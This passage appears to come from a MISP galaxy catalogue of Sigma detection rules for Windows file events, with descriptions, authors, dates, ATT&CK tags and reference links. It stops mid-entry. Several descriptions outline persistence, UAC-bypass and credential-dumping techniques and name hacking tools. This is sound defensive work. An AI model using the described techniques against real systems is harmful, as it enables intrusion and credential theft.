| author | Maxime Thiebaut (@0xThiebaut), Tim Shelton (HAWK.IO) |
| creation_date | 2020-03-19 |
| falsepositive | ['Operations performed through Windows SCCM or equivalent', 'Read only access list authority'] |
| filename | file_event_win_susp_desktop_ini.yml |
| level | medium |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.persistence', 'attack.t1547.009'] |
Related clusters
ScreenConnect Temporary Installation Artefact
An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc., to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
Internal MISP references
UUID fec96f39-988b-4586-b746-b93d59fd1922 which can be used as unique global reference for ScreenConnect Temporary Installation Artefact in MISP communities and other software using the MISP galaxy
External references
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-5---screenconnect-application-download-and-install-on-windows - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_remote_access_tools_screenconnect_artefact.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2022-02-13 |
| falsepositive | ['Legitimate use'] |
| filename | file_event_win_remote_access_tools_screenconnect_artefact.yml |
| level | medium |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.command-and-control', 'attack.t1219.002'] |
Related clusters
PowerShell Profile Modification
Detects the creation or modification of a PowerShell profile, which could indicate suspicious activity as the profile can be used as a means of persistence.
Internal MISP references
UUID b5b78988-486d-4a80-b991-930eff3ff8bf which can be used as unique global reference for PowerShell Profile Modification in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | HieuTT35, Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2019-10-24 |
| falsepositive | ['System administrator creating Powershell profile manually'] |
| filename | file_event_win_susp_powershell_profile.yml |
| level | medium |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.privilege-escalation', 'attack.t1546.013'] |
Related clusters
Potential Persistence Via Outlook Form
Detects the creation of a new Outlook form, which can contain malicious code.
Internal MISP references
UUID c3edc6a5-d9d4-48d8-930e-aab518390917 which can be used as unique global reference for Potential Persistence Via Outlook Form in MISP communities and other software using the MISP galaxy
External references
- https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=79 - webarchive
- https://www.slipstick.com/developer/custom-form/clean-outlooks-forms-cache/ - webarchive
- https://learn.microsoft.com/en-us/office/vba/outlook/concepts/outlook-forms/create-an-outlook-form - webarchive
- https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=76 - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_outlook_newform.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Tobias Michalski (Nextron Systems) |
| creation_date | 2021-06-10 |
| falsepositive | ['Legitimate use of outlook forms'] |
| filename | file_event_win_office_outlook_newform.yml |
| level | high |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.t1137.003'] |
Rclone Config File Creation
Detects the creation of Rclone config files.
Internal MISP references
UUID 34986307-b7f4-49be-92f3-e7a4d01ac5db which can be used as unique global reference for Rclone Config File Creation in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Aaron Greetham (@beardofbinary) - NCC Group |
| creation_date | 2021-05-26 |
| falsepositive | ['Legitimate Rclone usage'] |
| filename | file_event_win_rclone_config_files.yml |
| level | medium |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.exfiltration', 'attack.t1567.002'] |
Potential RipZip Attack on Startup Folder
Detects a phishing attack which expands a ZIP file containing a malicious shortcut. If the victim expands the ZIP file via the explorer process, then the explorer process expands the malicious ZIP file and drops a malicious shortcut, redirected to a backdoor, into the Startup folder. Additionally, the file name of the malicious shortcut in the Startup folder contains {0AFACED1-E828-11D1-9187-B532F1E9575D}, which denotes the folder shortcut operation.
Internal MISP references
UUID a6976974-ea6f-4e97-818e-ea08625c52cb which can be used as unique global reference for Potential RipZip Attack on Startup Folder in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Greg (rule) |
| creation_date | 2022-07-21 |
| falsepositive | ['Unknown'] |
| filename | file_event_win_ripzip_attack.yml |
| level | high |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.persistence', 'attack.t1547'] |
CSExec Service File Creation
Detects the default CSExec service filename, which indicates CSExec service installation and execution.
Internal MISP references
UUID f0e2b768-5220-47dd-b891-d57b96fc0ec1 which can be used as unique global reference for CSExec Service File Creation in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-08-04 |
| falsepositive | ['Unknown'] |
| filename | file_event_win_csexec_service.yml |
| level | medium |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.t1569.002', 'attack.s0029'] |
Potentially Suspicious WDAC Policy File Creation
Detects suspicious Windows Defender Application Control (WDAC) policy file creation by abnormal processes, which could be abused by an attacker to block EDR/AV components while allowing their own malicious code to run on the system.
Internal MISP references
UUID 1d2de8a6-4803-4fde-b85b-f58f3aa7a705 which can be used as unique global reference for Potentially Suspicious WDAC Policy File Creation in MISP communities and other software using the MISP galaxy
External references
- https://beierle.win/2024-12-20-Weaponizing-WDAC-Killing-the-Dreams-of-EDR/ - webarchive
- https://learn.microsoft.com/en-us/windows/security/application-security/application-control/app-control-for-business/deployment/deploy-appcontrol-policies-with-memcm - webarchive
- https://learn.microsoft.com/en-us/windows/security/application-security/application-control/app-control-for-business/deployment/appcontrol-deployment-guide - webarchive
- https://learn.microsoft.com/en-us/windows/security/application-security/application-control/app-control-for-business/deployment/deploy-appcontrol-policies-with-script - webarchive
- https://github.com/logangoins/Krueger/tree/main - webarchive
- https://learn.microsoft.com/en-us/windows/security/application-security/application-control/app-control-for-business/deployment/deploy-appcontrol-policies-using-group-policy - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_wdac_policy_creation.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | X__Junior |
| creation_date | 2025-02-07 |
| falsepositive | ['Administrators and security vendors could leverage WDAC, apply additional filters as needed.'] |
| filename | file_event_win_susp_wdac_policy_creation.yml |
| level | medium |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.defense-evasion'] |
UAC Bypass Using MSConfig Token Modification - File
Detects the pattern of UAC Bypass using an msconfig GUI hack (UACMe 55).
Internal MISP references
UUID 41bb431f-56d8-4691-bb56-ed34e390906f which can be used as unique global reference for UAC Bypass Using MSConfig Token Modification - File in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Christian Burkard (Nextron Systems) |
| creation_date | 2021-08-30 |
| falsepositive | ['Unknown'] |
| filename | file_event_win_uac_bypass_msconfig_gui.yml |
| level | high |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.privilege-escalation', 'attack.t1548.002'] |
Octopus Scanner Malware
Detects Octopus Scanner Malware.
Internal MISP references
UUID 805c55d9-31e6-4846-9878-c34c75054fe9 which can be used as unique global reference for Octopus Scanner Malware in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | NVISO |
| creation_date | 2020-06-09 |
| falsepositive | ['Unknown'] |
| filename | file_event_win_mal_octopus_scanner.yml |
| level | high |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.initial-access', 'attack.t1195', 'attack.t1195.001'] |
Hijack Legit RDP Session to Move Laterally
Detects the use of the tsclient share to place a backdoor in the RDP source machine's startup folder.
Internal MISP references
UUID 52753ea4-b3a0-4365-910d-36cff487b789 which can be used as unique global reference for Hijack Legit RDP Session to Move Laterally in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Samir Bousseaden |
| creation_date | 2019-02-21 |
| falsepositive | ['Unlikely'] |
| filename | file_event_win_tsclient_filewrite_startup.yml |
| level | high |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.command-and-control', 'attack.t1219.002'] |
Files With System DLL Name In Unsuspected Locations
Detects the creation of a file with the ".dll" extension that has the name of a System DLL in uncommon or unsuspected locations (outside of "System32", "SysWOW64", etc.). It is highly recommended to perform an initial baseline before using this rule in production.
Internal MISP references
UUID 13c02350-4177-4e45-ac17-cf7ca628ff5e which can be used as unique global reference for Files With System DLL Name In Unsuspected Locations in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2024-06-24 |
| falsepositive | ['Third party software might bundle specific versions of system DLLs.'] |
| filename | file_event_win_creation_system_dll_files.yml |
| level | medium |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1036.005'] |
Renamed VsCode Code Tunnel Execution - File Indicator
Detects the creation of a file with the name "code_tunnel.json", which indicates execution and usage of the VsCode tunneling utility by an "Image" or "Process" other than VsCode.
Internal MISP references
UUID d102b8f5-61dc-4e68-bd83-9a3187c67377 which can be used as unique global reference for Renamed VsCode Code Tunnel Execution - File Indicator in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-10-25 |
| falsepositive | ['Unknown'] |
| filename | file_event_win_vscode_tunnel_renamed_execution.yml |
| level | high |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.command-and-control'] |
Suspicious Binaries and Scripts in Public Folder
Detects the creation of a file with a suspicious extension in the public folder, which could indicate potential malicious activity.
Internal MISP references
UUID b447f7de-1e53-4cbf-bfb4-f1f6d0b04e4e which can be used as unique global reference for Suspicious Binaries and Scripts in Public Folder in MISP communities and other software using the MISP galaxy
External references
- https://intel.thedfirreport.com/events/view/30032 - webarchive
- https://thedfirreport.com/2025/01/27/cobalt-strike-and-a-pair-of-socks-lead-to-lockbit-ransomware/ - webarchive
- https://intel.thedfirreport.com/eventReports/view/70 - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_public_folder_extension.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | The DFIR Report |
| creation_date | 2025-01-23 |
| falsepositive | ['Administrators deploying legitimate binaries to public folders.'] |
| filename | file_event_win_susp_public_folder_extension.yml |
| level | high |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.t1204'] |
Windows Binaries Write Suspicious Extensions
Detects Windows executables that write files with suspicious extensions.
Internal MISP references
UUID b8fd0e93-ff58-4cbd-8f48-1c114e342e62 which can be used as unique global reference for Windows Binaries Write Suspicious Extensions in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-08-12 |
| falsepositive | ['Unknown'] |
| filename | file_event_win_shell_write_susp_files_extensions.yml |
| level | high |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1036'] |
New Custom Shim Database Created
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time.
Internal MISP references
UUID ee63c85c-6d51-4d12-ad09-04e25877a947 which can be used as unique global reference for New Custom Shim Database Created in MISP communities and other software using the MISP galaxy
External references
- https://andreafortuna.org/2018/11/12/process-injection-and-persistence-using-application-shimming/ - webarchive
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.011/T1546.011.md#atomic-test-2---new-shim-database-files-created-in-the-default-shim-database-directory - webarchive
- https://www.mandiant.com/resources/blog/fin7-shim-databases-persistence - webarchive
- https://liberty-shell.com/sec/2020/02/25/shim-persistence/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_creation_new_shim_database.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113, Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2021-12-29 |
| falsepositive | ['Legitimate custom SHIM installations will also trigger this rule'] |
| filename | file_event_win_creation_new_shim_database.yml |
| level | medium |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.persistence', 'attack.t1547.009'] |
UAC Bypass Using Consent and Comctl32 - File
Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22).
Internal MISP references
UUID 62ed5b55-f991-406a-85d9-e8e8fdf18789 which can be used as unique global reference for UAC Bypass Using Consent and Comctl32 - File in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Christian Burkard (Nextron Systems) |
| creation_date | 2021-08-23 |
| falsepositive | ['Unknown'] |
| filename | file_event_win_uac_bypass_consent_comctl32.yml |
| level | high |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.privilege-escalation', 'attack.t1548.002'] |
Potential Startup Shortcut Persistence Via PowerShell.EXE
Detects PowerShell writing startup shortcuts. This procedure was highlighted in Red Canary Intel Insights Oct. 2021, "We frequently observe adversaries using PowerShell to write malicious .lnk files into the startup directory to establish persistence. Accordingly, this detection opportunity is likely to identify persistence mechanisms in multiple threats. In the context of Yellow Cockatoo, this persistence mechanism eventually launches the command-line script that leads to the installation of a malicious DLL"
Internal MISP references
UUID 92fa78e7-4d39-45f1-91a3-8b23f3f1088d which can be used as unique global reference for Potential Startup Shortcut Persistence Via PowerShell.EXE in MISP communities and other software using the MISP galaxy
External references
- https://github.com/redcanaryco/atomic-red-team/blob/36d49de4c8b00bf36054294b4a1fcbab3917d7c5/atomics/T1547.001/T1547.001.md#atomic-test-7---add-executable-shortcut-link-to-user-startup-folder - webarchive
- https://redcanary.com/blog/intelligence-insights-october-2021/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_powershell_startup_shortcuts.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Christopher Peacock '@securepeacock', SCYTHE |
| creation_date | 2021-10-24 |
| falsepositive | ['Depending on your environment accepted applications may leverage this at times. It is recommended to search for anomalies indicative of malware.'] |
| filename | file_event_win_powershell_startup_shortcuts.yml |
| level | high |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.persistence', 'attack.t1547.001'] |
Cred Dump Tools Dropped Files
Detects the creation of files with well-known filenames (parts of credential dump software or files produced by them).
Internal MISP references
UUID 8fbf3271-1ef6-4e94-8210-03c2317947f6 which can be used as unique global reference for Cred Dump Tools Dropped Files in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Teymur Kheirkhabarov, oscd.community |
| creation_date | 2019-11-01 |
| falsepositive | ['Legitimate Administrator using tool for password recovery'] |
| filename | file_event_win_cred_dump_tools_dropped_files.yml |
| level | high |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.credential-access', 'attack.t1003.001', 'attack.t1003.002', 'attack.t1003.003', 'attack.t1003.004', 'attack.t1003.005'] |
Suspicious File Created in Outlook Temporary Directory
Detects the creation of files with suspicious file extensions in the temporary directory that Outlook uses when opening attachments. This can be used to detect spear-phishing campaigns that use suspicious files as attachments, which may contain malicious code.
Internal MISP references
UUID fabb0e80-030c-4e3e-a104-d09676991ac3 which can be used as unique global reference for Suspicious File Created in Outlook Temporary Directory in MISP communities and other software using the MISP galaxy
External references
- https://thecyberexpress.com/rogue-rdp-files-used-in-ukraine-cyberattacks/ - webarchive
- https://www.microsoft.com/en-us/security/blog/2024/10/29/midnight-blizzard-conducts-large-scale-spear-phishing-campaign-using-rdp-files/ - webarchive
- https://vipre.com/blog/svg-phishing-attacks-the-new-trick-in-the-cybercriminals-playbook/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_outlook_susp_file_creation_in_temp_dir.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems) |
| creation_date | 2025-07-22 |
| falsepositive | ['Opening of headers or footers in email signatures that include SVG images or legitimate SVG attachments'] |
| filename | file_event_win_office_outlook_susp_file_creation_in_temp_dir.yml |
| level | high |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.initial-access', 'attack.t1566.001'] |
HackTool - Inveigh Execution Artefacts
Detects the presence and execution of Inveigh via dropped artefacts.
Internal MISP references
UUID bb09dd3e-2b78-4819-8e35-a7c1b874e449 which can be used as unique global reference for HackTool - Inveigh Execution Artefacts in MISP communities and other software using the MISP galaxy
External references
- https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/ - webarchive
- https://github.com/Kevin-Robertson/Inveigh/blob/29d9e3c3a625b3033cdaf4683efaafadcecb9007/Inveigh/Support/Control.cs - webarchive
- https://github.com/Kevin-Robertson/Inveigh/blob/29d9e3c3a625b3033cdaf4683efaafadcecb9007/Inveigh/Support/Output.cs - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hktl_inveigh_artefacts.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-10-24 |
| falsepositive | ['Unlikely'] |
| filename | file_event_win_hktl_inveigh_artefacts.yml |
| level | critical |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.command-and-control', 'attack.t1219.002'] |
Legitimate Application Dropped Script
Detects scripts being written to disk by programs on a Windows system that should not write scripts.
Internal MISP references
UUID 7d604714-e071-49ff-8726-edeb95a70679 which can be used as unique global reference for Legitimate Application Dropped Script in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113, Florian Roth (Nextron Systems) |
| creation_date | 2022-08-21 |
| falsepositive | ['Unknown'] |
| filename | file_event_win_susp_legitimate_app_dropping_script.yml |
| level | high |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1218'] |
Potential Persistence Attempt Via ErrorHandler.Cmd
Detects the creation of a file named "ErrorHandler.cmd" in the "C:\WINDOWS\Setup\Scripts\" directory, which could be used as a method of persistence. The content of C:\WINDOWS\Setup\Scripts\ErrorHandler.cmd is read whenever some tools under C:\WINDOWS\System32\oobe\ (e.g. Setup.exe) fail to run for any reason.
Internal MISP references
UUID 15904280-565c-4b73-9303-3291f964e7f9 which can be used as unique global reference for Potential Persistence Attempt Via ErrorHandler.Cmd in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-08-09 |
| falsepositive | ['Unknown'] |
| filename | file_event_win_errorhandler_persistence.yml |
| level | medium |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.persistence'] |
Suspicious LNK Double Extension File Created
Detects the creation of files with an "LNK" as a second extension. This is sometimes used by malware as a method to abuse the fact that Windows hides the "LNK" extension by default.
Internal MISP references
UUID 3215aa19-f060-4332-86d5-5602511f3ca8 which can be used as unique global reference for Suspicious LNK Double Extension File Created in MISP communities and other software using the MISP galaxy
External references
- https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/ - webarchive
- https://twitter.com/luc4m/status/1073181154126254080 - webarchive
- https://www.cybereason.com/blog/research/a-bazar-of-tricks-following-team9s-development-cycles - webarchive
- https://twitter.com/malwrhunterteam/status/1235135745611960321 - webarchive
- https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_lnk_double_extension.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems), frack113 |
| creation_date | 2022-11-07 |
| falsepositive | ['Some tuning is required for other general purpose directories of third party apps'] |
| filename | file_event_win_susp_lnk_double_extension.yml |
| level | medium |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1036.007'] |
NTDS.DIT Creation By Uncommon Parent Process
Detects the creation of a file named "ntds.dit" (Active Directory Database) by an uncommon parent process or in an uncommon directory.
Internal MISP references
UUID 4e7050dd-e548-483f-b7d6-527ab4fa784d which can be used as unique global reference for NTDS.DIT Creation By Uncommon Parent Process in MISP communities and other software using the MISP galaxy
External references
- https://pentestlab.blog/tag/ntds-dit/ - webarchive
- https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration - webarchive
- https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Gather/Copy-VSS.ps1 - webarchive
- https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_ntds_dit_uncommon_parent_process.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2022-03-11 |
| falsepositive | ['Unknown'] |
| filename | file_event_win_ntds_dit_uncommon_parent_process.yml |
| level | high |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.credential-access', 'attack.t1003.003'] |
File With Uncommon Extension Created By An Office Application
Detects the creation of files with an executable or script extension by an Office application.
Internal MISP references
UUID c7a74c80-ba5a-486e-9974-ab9e682bc5e4 which can be used as unique global reference for File With Uncommon Extension Created By An Office Application in MISP communities and other software using the MISP galaxy
External references
- https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ - webarchive
- https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_susp_file_extension.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2021-08-23 |
| falsepositive | ['Unknown'] |
| filename | file_event_win_office_susp_file_extension.yml |
| level | high |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.t1204.002', 'attack.execution'] |
Created Files by Microsoft Sync Center
Detects suspicious files created by Microsoft Sync Center (mobsync).
Internal MISP references
UUID 409f8a98-4496-4aaa-818a-c931c0a8b832 which can be used as unique global reference for Created Files by Microsoft Sync Center in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | elhoim |
| creation_date | 2022-04-28 |
| falsepositive | ['Unknown'] |
| filename | file_event_win_susp_creation_by_mobsync.yml |
| level | medium |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.t1055', 'attack.t1218', 'attack.execution', 'attack.defense-evasion'] |
HackTool - CrackMapExec File Indicators
Detects file creation events with filename patterns used by CrackMapExec.
Internal MISP references
UUID 736ffa74-5f6f-44ca-94ef-1c0df4f51d2a which can be used as unique global reference for HackTool - CrackMapExec File Indicators in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2024-03-11 |
| falsepositive | ['Unknown'] |
| filename | file_event_win_hktl_crackmapexec_indicators.yml |
| level | high |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.credential-access', 'attack.t1003.001'] |
Suspicious File Write to Webapps Root Directory
Detects suspicious file writes to the root directory of web applications, particularly Apache web servers or Tomcat servers. This may indicate an attempt to deploy malicious files such as web shells or other unauthorized scripts.
Internal MISP references
UUID 89c42960-f244-4dad-9151-ae9b1a3287a2 which can be used as unique global reference for Suspicious File Write to Webapps Root Directory in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Swachchhanda Shrawan Poudel (Nextron Systems) |
| creation_date | 2025-10-20 |
| falsepositive | ['Unknown'] |
| filename | file_event_win_susp_file_write_in_webapps_root.yml |
| level | medium |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.t1505.003', 'attack.initial-access', 'attack.t1190'] |
Uncommon File Creation By Mysql Daemon Process
Detects the creation of files with scripting or executable extensions by the MySQL daemon, which could be an indicator of "User Defined Functions" abuse to download malware.
Internal MISP references
UUID c61daa90-3c1e-4f18-af62-8f288b5c9aaf which can be used as unique global reference for Uncommon File Creation By Mysql Daemon Process in MISP communities and other software using the MISP galaxy
External references
- https://asec.ahnlab.com/en/58878/ - webarchive
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/honeypot-recon-mysql-malware-infection-via-user-defined-functions-udf/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_mysqld_uncommon_file_creation.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Joseph Kamau |
| creation_date | 2024-05-27 |
| falsepositive | ['Unknown'] |
| filename | file_event_win_mysqld_uncommon_file_creation.yml |
| level | high |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.defense-evasion'] |
HackTool - Typical HiveNightmare SAM File Export
Detects files written by the various tools that exploit HiveNightmare.
Internal MISP references
UUID 6ea858a8-ba71-4a12-b2cc-5d83312404c7 which can be used as unique global reference for HackTool - Typical HiveNightmare SAM File Export in MISP communities and other software using the MISP galaxy
External references
- https://github.com/FireFart/hivenightmare/ - webarchive
- https://github.com/WiredPulse/Invoke-HiveNightmare - webarchive
- https://twitter.com/cube0x0/status/1418920190759378944 - webarchive
- https://github.com/GossiTheDog/HiveNightmare - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hktl_hivenightmare_file_exports.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2021-07-23 |
| falsepositive | ['Files that accidentally contain these strings'] |
| filename | file_event_win_hktl_hivenightmare_file_exports.yml |
| level | high |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.credential-access', 'attack.t1552.001', 'cve.2021-36934'] |
Suspicious Outlook Macro Created
Detects the creation of a macro file for Outlook.
Internal MISP references
UUID 117d3d3a-755c-4a61-b23e-9171146d094c which can be used as unique global reference for Suspicious Outlook Macro Created in MISP communities and other software using the MISP galaxy
External references
- https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=53 - webarchive
- https://www.linkedin.com/pulse/outlook-backdoor-using-vba-samir-b-/ - webarchive
- https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_outlook_susp_macro_creation.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-02-08 |
| falsepositive | ['Unlikely'] |
| filename | file_event_win_office_outlook_susp_macro_creation.yml |
| level | high |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.persistence', 'attack.command-and-control', 'attack.t1137', 'attack.t1008', 'attack.t1546'] |
UAC Bypass Using .NET Code Profiler on MMC
Detects the pattern of UAC Bypass using a .NET Code Profiler and mmc.exe DLL hijacking (UACMe 39).
Internal MISP references
UUID 93a19907-d4f9-4deb-9f91-aac4692776a6 which can be used as unique global reference for UAC Bypass Using .NET Code Profiler on MMC in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Christian Burkard (Nextron Systems) |
| creation_date | 2021-08-30 |
| falsepositive | ['Unknown'] |
| filename | file_event_win_uac_bypass_dotnet_profiler.yml |
| level | high |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.privilege-escalation', 'attack.t1548.002'] |
Suspicious File Creation Activity From Fake Recycle.Bin Folder
Detects file write event from/to a fake recycle bin folder that is often used as a staging directory for malware
Internal MISP references
UUID cd8b36ac-8e4a-4c2f-a402-a29b8fbd5bca which can be used as unique global reference for Suspicious File Creation Activity From Fake Recycle.Bin Folder in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | X__Junior (Nextron Systems) |
| creation_date | 2023-07-12 |
| falsepositive | ['Unknown'] |
| filename | file_event_win_susp_recycle_bin_fake_exec.yml |
| level | high |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.defense-evasion'] |
LSASS Process Dump Artefact In CrashDumps Folder
Detects the presence of an LSASS dump file in the "CrashDumps" folder. This could be a sign of LSASS credential dumping. Techniques such as the LSASS Shtinkering have been seen abusing the Windows Error Reporting to dump said process.
Internal MISP references
